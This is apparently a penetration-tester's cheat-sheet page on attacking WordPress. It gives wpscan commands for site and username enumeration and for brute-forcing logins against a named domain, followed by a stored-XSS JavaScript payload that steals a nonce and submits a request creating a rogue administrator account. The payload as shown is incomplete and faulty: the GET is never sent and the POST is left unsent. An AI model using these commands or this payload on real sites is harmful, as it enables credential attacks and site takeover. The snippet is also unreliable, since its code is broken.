# Default enumeration
wpscan --url https://parzival.sh/ 

# Enumerate usernames
wpscan --url https://parzival.sh/ -e u 

# Bruteforce Wordpress
wpscan --url https://parzival.sh/ -U $usernamelist -P $passwordlist

Turning XSS to RCE

When identifying a Wordpress site that is vulnerable to cross-site scripting, there are some well documented payloads and resources out there which increase the severity if an Administrator were to trigger the payload. For example, if a stored cross-site scripting vulnerability affects a plugin. The following is a snippet of a Hakluke payload linked below which attempts to create a new administrator user:

var wp_root = "" // don't add a trailing slash
var req = new XMLHttpRequest();
var url = wp_root + "/wp-admin/user-new.php";
var regex = /ser" value="([^"]*?)"/g;
req.open("GET", url, false);
var nonce = regex.exec(req.responseText);
var nonce = nonce[1];
var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=hacker&email=hacker@example.com&pass1=AttackerP455&pass2=AttackerP455&role=administrator";
req.open("POST", url, true);
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

Last updated